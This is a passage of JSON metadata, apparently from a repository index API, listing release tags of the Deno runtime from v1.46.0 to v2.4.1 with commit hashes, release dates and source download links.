denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,